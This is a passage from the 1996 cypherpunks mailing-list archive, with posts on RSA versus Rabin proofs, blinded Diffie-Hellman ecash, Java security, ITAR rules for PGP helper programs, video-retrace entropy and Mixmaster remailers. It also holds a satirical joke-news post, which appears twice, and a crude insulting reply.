> intercepts, I don't think there are any valid proofs of the security of
> complete crypto-systems.

In that case, why do you think that an RSA system would be better
implemented as a matter of necessity than a Rabin system?

> While anyone who can factor RSA keys can break
> RSA, factoring has been intensively studied since RSA was published.  The
> public information says that in spite of improvements, factoring is still a
> hard problem.  If people in Maryland can factor big RSA keys, they're Not
> Saying Anything.

You didn't hear what I said.

There is no proof that RSA is equivalent to factoring -- only a strong
belief. There may exist ways to break RSA that do not involve
factoring. Rabin, however, is provably equivalent to factoring.

> So far, I'll stand by my two contentions:
> 
> 7a) RSA is the best known public key algorithm.

Meaningless and unimportant.

> 7b) RSA is the best vetted public key algorithm.

Again, false. RSA has no proofs of security, and other systems have
far better proofs. RSA also leaks small bits of information like
parity that other systems do not leak. This is not to say that RSA is
bad, but its choice over, say, Rabin, at least for encryption, is
fairly abitrary.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Thu, 25 Apr 1996 09:58:44 -0700 (PDT)
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: Anonymous banking
Message-ID: <v0211010eada565770ee0@[194.125.43.36]>
MIME-Version: 1.0
Content-Type: text/plain



4/24/96, E. ALLEN SMITH wrote:
>>But Washington last year ranked Austria alongside Colombia, Venezuela and
>>Thailand in a league table of nations that tolerate money laundering.

        Ha ha!  The U.S. and Panama probably exceed all of the above in
laundering, but of course the USA/CIA doesn't notice those, since they're
"in the family".

-rkm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 25 Apr 1996 17:56:34 -0700 (PDT)
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Capability Security in Java
Message-ID: <199604260056.RAA00833@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:38 PM 4/25/96 -0700, Simon Spero wrote:
>One thing that could be retroactively added to the vm pretty easily would 
>be the ability to add capability requirements to methods, and have the 
>class loader automatically generate code to check for those requirements 
>before executing the body of the method

Now there is a statement that makes me sit up and take notice.  I certainly
havn't thought this subject thru carefully, but to start, I think I would
like capabilities to be held by a specific object, so if I give a Java
object permission to read a file, that permission is not automatically
inherited by other objects, or instances of the same object which use the
common method.

There would also have to be a technique where capabilities could be passed
from object to object to allow subcontracting.

Having the capabilities held by objects means that access the objects needs
to be controled as well.  I notice some items on Hal's list of Java
security problems which indicate weaknesses in this area, but it is not
clear if they are bugs (which will be fixed) or "features".

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Childers <JC6452@FS2HOST.CCCCD.EDU>
Date: Thu, 25 Apr 1996 17:05:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RE: Mindshare and Java
Message-ID: <96Apr25.190047cdt.9739@cricket.ccccd.edu>
MIME-Version: 1.0
Content-Type: text/plain



> > As cool as many of the people on the Java team are, though, I am dubious
> > that Java is going to live up to the hype. 

Same here. If someone writes a secure electronic-wallet type system 
with Java, then I'll be impressed. Until then, all I've seen 
implemented is kEWL text graphics. 

> There was an official announcement at their Professional Developers Conference
> a few weeks back.  In short, full support in the browsers (and apparently MS 
> is now the keeper of the reference implementation on Win32) and also
> a full blown Java development environment code-named 'Jakarta'.

Didn't MS ditch their proprietary Java-like language? Interesting, if 
so...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 25 Apr 1996 17:24:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ROC_poc
Message-ID: <199604260022.UAA05445@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   4-25-96. WaPo:

   "Israelis Eye U.S. Laser As Anti-Rocket Defense. Nautilus
   High-Energy Laser Beam Burns Surface of Weapon."

      Two months ago, in a test at the White Sands Missile
      Range in New Mexico, the U.S. Army used the laser to
      shoot down two Katyusha rockets that earlier had been
      seized by Israel. The test caught the attention of the
      aerospace community because it offered evidence of
      Nautilus's efficacy, especially its new tracking system
      upgraded with more sophisticated computer software. The
      laser, beamed at a rocket for only a second or two,
      disables it by melting its surface, causing it to
      explode and crash to Earth.

   "Spy Chief's Grasp Reaches Other Pockets."

      The Senate intelligence committee yesterday approved a
      major expansion in power for the director of central
      intelligence (DCI) by giving the director authority not
      only over the CIA budget but also over all intelligence
      spending, most of which currently is controlled by the
      Pentagon. Such a radical change is likely to run into
      strong opposition not only from the military services
      themselves, but also from other congressional committees
      with Pentagon oversight.

   ROC_poc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 25 Apr 1996 17:22:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Mixmaster message formats
Message-ID: <Pine.LNX.3.92.960425200950.1060A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I was thinking about how Mixmaster needs a separate message format so it
can make messages a fixed size and add a packet ID.  However, couldn't all
this be done with PGP?  With PGP, the length of the file being encrypted is
encrypted itself, so it would be possible to append random data to the end
of the file to make the message a fixed length like Mixmaster.  Also, the
packet-ID could be implemented by putting a line such as the following in the
message:

::
Packet-ID: foobar

The only other thing that would have to be taken care of is chaining.  The
way I could see this working is to have a header in the encrypted message that
tells the remailer whether it should de-armor the message at the next layer,
append random data, then re-armor, and pass it to the next remailer.  Am I
missing something?

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMYAXxLZc+sv5siulAQG5CwP/Qbgune3sjNyB7Y8xNxNW6hCahtgBNJDk
oT+hZHdlmcB6CZXjgDUSczIfAnygS71PBBysB4DJnugluMTMTGfqmgeikXdvL1zt
vnwx5xlG0HQeTbVE2+c1uW4uamkdb0MZmNLR06S9M+2i0ROaWzGwNO6WEHqoEL3W
qwXZ7zPtId0=
=MaO4
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 2 Apr 1996 07:44:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Chaumian ecash without RSA
Message-ID: <199604021544.HAA26145@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:10 AM 3/31/96 -0800, David Wagner wrote:
> The bank picks a secret value k, and publishes g^k.
>
> To withdraw a coin, Alice picks an x, sets
>	y = x | hash(x),                [  | is concatenation  ]
> chosen so that y is in G.  Alice chooses a random secret blinding factor b,
> sends to the bank
>	A->B: y g^b,
> and the bank returns
>	B->A: (y g^b)^k,
> debiting Alice's account.
>
> Note that this is a (blinded) Diffie-Hellman key exchange with public
> exponentials g^k and y g^b; the bank returns the exchanged "secret".
>
> Alice unblinds this value, computing
>	z = (y g^b)^k (g^k)^{-b}
> and now c = (x,z) is a coin in the digital cash system.  Note z = y^k.
>
> We use the traditional online clearing protocol; to deposit the coin, a
> shop S sends
>	S->B: x, z.
> The bank checks to make sure the coin hasn't already been spent, and then
> computes
>	y = x | MD5(x),
> checking whether y^k = z. 

Two irritations with this protocol:

1:  A coin is almost twice the size of a coin in the RSA protocol

2:  Nobody except the bank can verify that a coin has face validity.

The second point is more serious than you might think, as most of 
us want to see a world where everyone is his own bank and his own 
credit rating agency, as well as his own publisher.

It will obstruct contracts of the form "Anne promises to provide 
numbers with certain cryptographic properties, provided Bob provides
numbers with certain cryptographic properties."

With RSA crypto cash, Anne can construct a blinded unsigned coin, 
and ask Bob to have it signed.  For this to be reasonably convenient
and practical, we need to have locally verifiable signatures.

For computer mediated management of contracts, transactions, and 
credit ratings, we need contracts such that all intermediate 
transactions can be reduced to locally verifiable cryptographic 
protocols.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Wed, 3 Apr 1996 06:54:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: software with "hooks" for crypto
Message-ID: <2.2.32.19960403145406.0034a4d4@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 02:31 PM 4/2/96 -0800, you wrote:
>Hello all,
>
>I'm trying to figure out exactly what the laws are regarding the export of
>software which contains "hooks" for PGP.  In various forms, I've heard
>that it's not the ITAR which prevents this, but more a "suggestion" by
>the NSA that we "shouldn't do it."  Does anyone have any pointers to
>real legislation/laws regarding this?

There are a number of "PGP Helpers" (If this is Tuesday, it must be PGP) out
there.  These are other PGP front end applications such as Private Idaho,
PGPShell and others that do NOT include PGP, nor do they contain any
encryption code within them.  These applications are all billed as "freely
exportable".  If your software does not contain any encryption code, such
that it simply "invokes" the users separately-obtained-and-installed copy of
PGP, you are not in violation of ITAR.  It sounds like this is what you're
doing with your "hooks for PGP".

I would recommend you visit a couple of these helper application sites and
check out what their authors say about the exportability of their code.  You
might ask them if they have encountered any legal difficulties because their
code is advertised as freely exportable.  Private Idaho is available at
www.eskimo.com/~joelm and (rats) you'll have to hunt PGPShell down yourself.

If you actually include the RSA algorithms, the IDEA algorithm, or any
"cryptographic" code in your software, then yes, you could get in trouble
for exporting it.

Again, remember that I'm not a lawyer and that any legal advice you get from
anyone on the net is worth exactly what you pay for it.

-j, is anyone else finding it harder to say the "Pledge of Allegiance" to
this country these days?
--
J. Deters
>From our _1996_Conflict_of_Interest_Statement_, re: our No Gift policy:
 "If you receive any alcoholic beverages, for example, a bottle of wine,
  you must give the gift to your location Human Resources Manager." 
This memo is from the Senior V.P. of Human Resources.
+---------------------------------------------------------+
| NET:     jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:    1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'33"N by 93^16'42"W Elev. ~=290m (work)     |
| PGP Key ID:  768 / 15FFA875                             |
+---------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 3 Apr 1996 08:43:21 -0800 (PST)
To: <s1113645@tesla.cc.uottawa.ca
Subject: Re: Canada's ISO standards body?
Message-ID: <199604031643.IAA18779@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


 Simon Spero <ses@tipper.oit.unc.edu wrote:
> 
> On Thu, 28 Mar 1996 s1113645@tesla.cc.uottawa.ca wrote:
> 
> > Speaking of which, could someone tell me who Canada's standards body and 
> > rep to the ISO is (and if that's where I've gotta go to get my hands on X.509
> > and all those other X.docs.). Any addresses would be helpful too.
> 
> Try www.itu.org (X. series docs come from the ITU, not ISO. Same text 
> though).

While the International Triathlon Union may be a standards body in it's own field,
it has shockingly little influence on the X series of communications standards. You 
might try the International Telecommunications Union, at www.itu.ch.

 > I don't think v3 has been balloted yet - that gives you a chance to 
> explore one of the more amusing twists of OSI standardisation- you can
 > get copies for free of most drafts from the editor right up until it gets 
> standardised. Silly, isn't it. 

Haven't located it yet.
 
> Simon

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yap Remailer <remailer@yap.pactitle.com>
Date: Wed, 3 Apr 1996 16:41:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: National id already here?
Message-ID: <199604040035.QAA24941@yap.pactitle.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.aamva.net/AAMVAnet_New_Systems.html says:
    Coman said [police] officers can use "CDLISCheck" to access commercial
    driver license status, history and AKA information. She noted that
    the new service was developed in response to a Congressional mandate
    that requires access to commercial carrier and driver information by
    at least 100 roadside sites by 1996 and at least 200 locations by 1997.

There's a congressional mandate for nationwide online id???





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: enquirer@alpha.c2.org
Date: Wed, 3 Apr 1996 16:51:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cypherpunk Enquirer
Message-ID: <199604040040.QAA24093@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain




			THE CYPHERPUNK ENQUIRER

                   "Encyphering minds want to know."


The Enquirer has strong evidence that a group of well known cypherpunks
is using the nym Jim Bell in a conspiracy to wheedle a free legal education
out of the Black Unicorn.  As one of the anonymous unindicted co-conspirators
stated recently on the semi-secret coderpunks mailing list, "If Mr. Bell
had not already existed, we probably would have been forced to invent him."
Mr. Bell has pleaded innocent to charges that he is assisting the group,
stating that his judgement was impaired by the ingestion of large quantities
of sugar in the form of Hostess chocolate covered cupcakes, otherwise know as
the "Ding Dong Defense".

Microsoft announced today that it has achieved B1 Orange Book security on
a Windows NT box by encasing the computer in concrete and sinking it to the
bottom of the Marianas Trench.  C2 security had previously been attained
for Windows 95 by adding a warning message that the C2 rating was voided 
by any use of the I/O bus.  In other news, the DoD has announced it is
suing c2.org for unauthorized appropriation of the C2 security designation.
A DoD spokesperson stated that, "they can use the C2 designation all they
want to as long as they don't hook it up to a network."

Novell has announced that all future versions of Netware will abandon their
proprietary IPX protocol, in favor of IPv6.  "That way," claimed a Novell
spokesperson, "we won't have to worry about Netware 5.0 for at least a
couple of years, and if we still can't get it out in time, we'll just
announce that we're waiting for PGP 3.0." 

Timothy May is spending his recuperative time in the Corralitos General
Hospital learning some Spanish.  Mr. May suffered a broken nose, a sprained
neck, and multiple bruises and contusions in a local Mexican restaurant after
a friend jokingly told him that the Spanish translation of "Where's the
restroom?" was "Puta tu madre".

Perry Metzger announced a new theoretical attack on so-called 'smart card'
technology such as the Fortezza card.  Using the newly developed
Continuous Atomic-Level Asynchronous Magnetic Array Resonance Interferometer,
Mr. Metzger speculated that it should be possible to train a school of
the little nanotechnological wonders (also affectionately known as
"Detweilers" because of their many tentacles) to swim up a PCMCIA port
and back out the NSA's secret trap door with code fragments clutched in
their suction cups.

Raph Levien lost an important court case recently, when a federal judge 
ruled that his son (born March 17, 1996) will legally be known as Alan
Mathison Levien until he's old enough to decide for himself whether he
wants to be named after his PGP key fingerprint.

Netscape Communications announced today that they were launching a hostile
takeover bid of $35/share for Lance Cottrell in order to get his highly
coveted export-controlled ftp site technology.  Netscape engineers,
stymied after a year and a half of effort to code a secure export-
controlled ftp site, have hailed the new acquisition.  Jeff Weinstein,
Electronic Munitions Specialist at Netscape, stated, "Now we'll finally be
able to offer the same RC4 128 security to our beta testers as we offer
to our regular clients.  Non-domestic users, unfortunately, will still
have to install it themselves by copying it off the T-shirts." 

Employees of the FBI have banded together to purchase director Louis Freeh
a cowboy belt with his name embossed on the back, so that when the 
proctologists at Bethesda Naval Hospital finally get his head unstuck, 
he'll be able to see who he is.

After a recent discussion of WWII "codetalkers" on the cypherpunks mailing
list, the NSA and DoD have banned Native Americans of Navahoe descent
from leaving the country without first filing a CJR.

The sale of Internet Security Guaranteed to the Elementrix Corporation for
one dollar was cancelled today after San Francisco securities analysts
Hambrecht and Quist declared ISG 'overvalued'.

CERT has announced the first discovery of a computer 'prion'.  The prion,
which affects only Microsoft's Explorer web browser, causes the victim's
hard drive to slowly fill with holes until his data turns to mush.  Bill
Gates reportedly started foaming at the mouth when told of the new threat
to Internet security, causing Microsoft employees to dub the new affliction
"Mad Bill Disease", which resulted in Mr. Gates being banned in Britain. 

Next in the Enquirer:  Direct from the CDA hearings, Marty Rimm and
Dorothy Denning demonstrate the "Rimm" job. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: enquirer@alpha.c2.org
Date: Wed, 3 Apr 1996 16:51:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cypherpunk Enquirer
Message-ID: <199604040041.QAA24115@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain




			THE CYPHERPUNK ENQUIRER

                   "Encyphering minds want to know."


The Enquirer has strong evidence that a group of well known cypherpunks
is using the nym Jim Bell in a conspiracy to wheedle a free legal education
out of the Black Unicorn.  As one of the anonymous unindicted co-conspirators
stated recently on the semi-secret coderpunks mailing list, "If Mr. Bell
had not already existed, we probably would have been forced to invent him."
Mr. Bell has pleaded innocent to charges that he is assisting the group,
stating that his judgement was impaired by the ingestion of large quantities
of sugar in the form of Hostess chocolate covered cupcakes, otherwise know as
the "Ding Dong Defense".

Microsoft announced today that it has achieved B1 Orange Book security on
a Windows NT box by encasing the computer in concrete and sinking it to the
bottom of the Marianas Trench.  C2 security had previously been attained
for Windows 95 by adding a warning message that the C2 rating was voided 
by any use of the I/O bus.  In other news, the DoD has announced it is
suing c2.org for unauthorized appropriation of the C2 security designation.
A DoD spokesperson stated that, "they can use the C2 designation all they
want to as long as they don't hook it up to a network."

Novell has announced that all future versions of Netware will abandon their
proprietary IPX protocol, in favor of IPv6.  "That way," claimed a Novell
spokesperson, "we won't have to worry about Netware 5.0 for at least a
couple of years, and if we still can't get it out in time, we'll just
announce that we're waiting for PGP 3.0." 

Timothy May is spending his recuperative time in the Corralitos General
Hospital learning some Spanish.  Mr. May suffered a broken nose, a sprained
neck, and multiple bruises and contusions in a local Mexican restaurant after
a friend jokingly told him that the Spanish translation of "Where's the
restroom?" was "Puta tu madre".

Perry Metzger announced a new theoretical attack on so-called 'smart card'
technology such as the Fortezza card.  Using the newly developed
Continuous Atomic-Level Asynchronous Magnetic Array Resonance Interferometer,
Mr. Metzger speculated that it should be possible to train a school of
the little nanotechnological wonders (also affectionately known as
"Detweilers" because of their many tentacles) to swim up a PCMCIA port
and back out the NSA's secret trap door with code fragments clutched in
their suction cups.

Raph Levien lost an important court case recently, when a federal judge 
ruled that his son (born March 17, 1996) will legally be known as Alan
Mathison Levien until he's old enough to decide for himself whether he
wants to be named after his PGP key fingerprint.

Netscape Communications announced today that they were launching a hostile
takeover bid of $35/share for Lance Cottrell in order to get his highly
coveted export-controlled ftp site technology.  Netscape engineers,
stymied after a year and a half of effort to code a secure export-
controlled ftp site, have hailed the new acquisition.  Jeff Weinstein,
Electronic Munitions Specialist at Netscape, stated, "Now we'll finally be
able to offer the same RC4 128 security to our beta testers as we offer
to our regular clients.  Non-domestic users, unfortunately, will still
have to install it themselves by copying it off the T-shirts." 

Employees of the FBI have banded together to purchase director Louis Freeh
a cowboy belt with his name embossed on the back, so that when the 
proctologists at Bethesda Naval Hospital finally get his head unstuck, 
he'll be able to see who he is.

After a recent discussion of WWII "codetalkers" on the cypherpunks mailing
list, the NSA and DoD have banned Native Americans of Navahoe descent
from leaving the country without first filing a CJR.

The sale of Internet Security Guaranteed to the Elementrix Corporation for
one dollar was cancelled today after San Francisco securities analysts
Hambrecht and Quist declared ISG 'overvalued'.

CERT has announced the first discovery of a computer 'prion'.  The prion,
which affects only Microsoft's Explorer web browser, causes the victim's
hard drive to slowly fill with holes until his data turns to mush.  Bill
Gates reportedly started foaming at the mouth when told of the new threat
to Internet security, causing Microsoft employees to dub the new affliction
"Mad Bill Disease", which resulted in Mr. Gates being banned in Britain. 

Next in the Enquirer:  Direct from the CDA hearings, Marty Rimm and
Dorothy Denning demonstrate the "Rimm" job. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Wed, 3 Apr 1996 17:46:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Video retraces as a source of entropy...
Message-ID: <199604040205.VAA15030@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Quickie blurb on using video card retraces as a source of entropy...

I've done some brief testing in the last couple of days on using the 
timing drift between video retrace events as a source of randomness.
It seems comparable to truerand() spinners that check the system's 
timer ticks [which makes me leary of relying on it since it
has similar strange attractors when plotted in a noise sphere, but
that's another post...].

Assuming one trusts truerand spinners, this method could have some 
advantages over a 'pure software' method, since the video controller
(and other hardware controllers which could be adapted to this) runs 
in 'parallel' [although it's liable to the samefluctuations in current or 
memory-access and other interfaces with the main system, or possibly 
tempest attacks for the paranoid...].

In pseudo-C:

int retrace(void) { // test for video retrace
#ifdef __MSDOS__
  return (port[0x3da] & 8); // Some VGA, maybe EGA cards
#else
  // your OS here
#endif
}

  [..]
   x = 0;
  while (!retrace()) x++;

I've tested it as  standalone routines (in Pascal and assembler)  as well as
a hook to the DOS idle in the background [See note about strange
atteactors above].  It also seems to work while in Windows (but not
OS/2?!), which is an advantage over using the system's microsecond
timer alarm (which Win3 takes over).

Comments? (other than "truerand is an oxymoron"....)

Rob. 

---
Send a blank message with the subject "send pgp-key"
to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 1 May 1996 18:40:40 +0800
To: Ted Garrett <teddygee@visi.net>
Subject: Re: no-cost DH?
In-Reply-To: <199605010614.CAA18159@london.visi.net>
Message-ID: <Pine.SUN.3.93.960501000301.3114A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 1 May 1996, Ted Garrett wrote:

> Sorry, Perry.  This time you are wrong.  Cylink is giving away their 
> Passport Gold SDK (Security Development Kit).  Period.  I've just recieved 
> the documentation on the SDK itself, and am expecting shipment of the SDK 
> itself about the middle of May.

I found some more information about this on Cylink's web site.  Check out
http://www.cylink.com/products/security/passport/.  I'm surprised not to
have seen more publicity about this, since it seems to be a fairly big
move on Cylink's part.

Apparently Cylink is only licensing their SDK at no cost, not the actual
patents.  Does anyone want to speculate on why they are doing this now?

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 1 May 1996 18:47:18 +0800
To: perry@piermont.com
Subject: Network Sex
Message-ID: <199605010721.AAA09840@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:50 PM 4/30/96 -0400, Perry E. Metzger wrote:
>I was under the impression that sex involved physical presense.

In her lecture for ee380 at Stanford, Lisa Palac was asked, Well, just how
do you have sex on the net?

Her answer indicated that essentially you talk dirty with your partner and
masturbate.  IMHO netsex eliminates the possibility of sexually transmitted
disease.  The abstract for her lecture (from
http://www-leland.stanford.edu/class/ee380/) is:

>Apr 3: Lisa Palac, Author: Sex and the Single Cyberchick 
>
>Speaker: Lisa Palac, Author and Founding Editor, Future Sex Magazine 
>
>Title: Sex and the Single Cyberchick 
>
>Abstract 
>
>This lectures discusses the ways computer technology is fundamentally 
>changing the sexual landscape. Facts and fictions about cybersex, the 
>moral panic over porn on the Internet and erotic liberation in the 
>digital domain. 
>
>Biography 
>
>Lisa Palac is the producer of the erotic virtual audio series 
>*Cyborgasm*, http://www.iuma.com/cyborgasm and the founding editor 
>of Future Sex magazine. She is currently writing on a book about sex 
>and popular culture titled, The Edge of the Bed. 
>

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Wed, 1 May 1996 17:08:20 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <199605010033.UAA15101@jekyll.piermont.com>
Message-ID: <199605010528.AAA00506@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> It is difficult. The way Java does this, with the protection relying
> solely on the correctness of the runtime (the interpreter isn't
> emasculated so flaws in the runtime can cause unexpected behavior) it
> is nearly impossible. Humans aren't good enough at designing systems
> this century.

One thing that I'm sort of fuzzy on is whether or not you feel that this 
is a problem specific to this one group of products (java) or if it's a 
problem with the general idea of grabbing and running applets 
indiscriminently in a protective environment.

As some recent posts here have shown, when people start working with java
applets, subtle problems (like not being able to put your hands on enough
entropy) emerge.  It may turn out that after a year or two the list of
complaints will be long enough that a demand for a successor to java will
emerge.  I would have to think that after a bit of practical experience, 
it will be possible to build a better java.

Right now, as near as I can tell, we have two major security complaints
with java's design.  The first is Perry's point (which I might be
munging), that there isn't enough redundancy in the security to protect us
if and when human error creeps in.  The second is that a rigorous formal
analysis of the language hasn't been performed, and that the language as
it is currently constituted doesn't lend itself to such an analysis. 

Can these problems be solved, at least in theory, in a new language?  
Are there other changes that ought to be considered?  Etc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Loomis <ml3e+@andrew.cmu.edu>
Date: Wed, 1 May 1996 16:49:44 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <Pine.3.89.9604281554.A30287-0100000@tesla.cc.uottawa.ca>
Message-ID: <wlVipJy00iVC8Ms5tV@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 28-Apr-96 Re: CryptoAnarchy: What's
w.. by s1113645@tesla.cc.uottaw 
> The result of this might be that the netshore economy might actually 
> have lower overhead and an easier interface to its users than the 
> physical world version. If people's easiest intro to economics and the 
> job market is such a simple anarchy and the place where they get most 
                                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> of their entertainment, education and generally spend most of their lives 
 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^    
                       
> is such an impossible to regulate environment, what do you think this 
> bodes for state control? Or people's desire for it? 

This explains far more of the rhetoric on this mailing list than
anything I could possibly write:  the young libertarians having lived
their teenage years alone in their bedrooms listening to heavy metal
music or Rush or Sisters of Mercy through headphones in order to not
disturb their fathers and masturbating looking at porno pics and
imagining the chicks think just like Ayn Rand have now reached the adult
stage in which they don't have to use headphones, they can admit they
hate their father, they don't have to pay taxes, and they can spend most
of their lives in front of a computer.

Michael Loomis
"Tax Collector Want to Be for the Welfare State"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 1 May 1996 18:19:50 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <199605010033.UAA15101@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.91.960501004152.394B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Apr 1996, Perry E. Metzger wrote:
> The Web is the universal marketplace these days. Being unable to use
> the web is the equivalent of being unable to use the phone. I have

	I'm sorry, I don't buy this. Last time I saw any stats, less than
5% of AMERICANS have access to the internet in any form. Even if it has
doubled in the last 3 months, that is still only 10%, Now yes, someday
what you say may be true, but most people have never seen the web, execpt
_maybe_ on TV. My father runs a relatively sucessful business, which he
started last year, and he has almost never used a computer more
sophisticated than a calculator (I gave him a zenith supersport (8088)
laptop that he has turned on ONCE)--he dosen't even believe in Cash
Stations). To claim that that being unable to use the web is the 
equivalent of being unable to use the phone is silly, and to an extent 
myopic. 

> research analysts at large trading houses begging for
> Netscape. Unfortunately, these people have a need for top notch
> security, because vast amounts of money are at stake.

	There is a simple, but expensive way around this. 

	The rest cut because I am not qualified to comment


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Wed, 1 May 1996 17:46:44 +0800
To: cypherpunks@toad.com
Subject: Re: "Scruffies" vs. "Neats"
In-Reply-To: <01I460YIKXG08Y50HU@mbcl.rutgers.edu>
Message-ID: <199605010603.BAA00552@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


For whatever it's worth, my position fits into Tim's taxonomy pretty 
well.

I think it's worthwhile to do enough to protect people from their
sysadmins, even if it won't protect them from the NSA.

The important thing is to take care not to create standards or large user
communities that will force more determined people to choose between 
security and interoperability.  

For example:  a mail system that can only work with small keys ought to be
avoided;  but a mail system that uses large keys and clients with crummy
random number generators ought to be deployed, if it has some significant
advantage (like user friendliness) over other systems that currently
exist. 

A java mixmaster applet with a bad random number generator would probably
be the best game in town for most people.  Is it good enough?  No.  But is
it better than anything that's currently available (in a practical sense)
to the typical ms-windows user?  Yes.  And that's enough reason to deploy 
it.

Unix clients and the mixmaster remailer network are capable of providing
much better security to anyone who wants to pursue it -- the poor quality
of the java version doesn't impose a ceiling on other users.  And a clear
path of improvements exists (ie., easy to use dos and mac native code
clients, or a better java applet) to pull the low end users up to where
the unix users are now.

Deployment is the thing that's going to make putting the genie back in the
bottle impossible.  10,000,000 people who use a flawed java implementation
of some crypto applet are still 10,000,000 people who are going to scream
bloody murder if crypto's banned.  There is a lot of political value in 
getting something out there, even if it's less than perfect.

(Incidently, I'd like to encourage more people to set up mixmaster
remailers.  I've had mine (nsa@omaha.com) up for several weeks, and I
haven't had a single complaint or hassle from it.  That's not at all what 
I expected -- I figured people would be complaining all the time.  If I 
had known how it would turn out, I would have set it up a long time 
ago.)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 1 May 1996 20:19:39 +0800
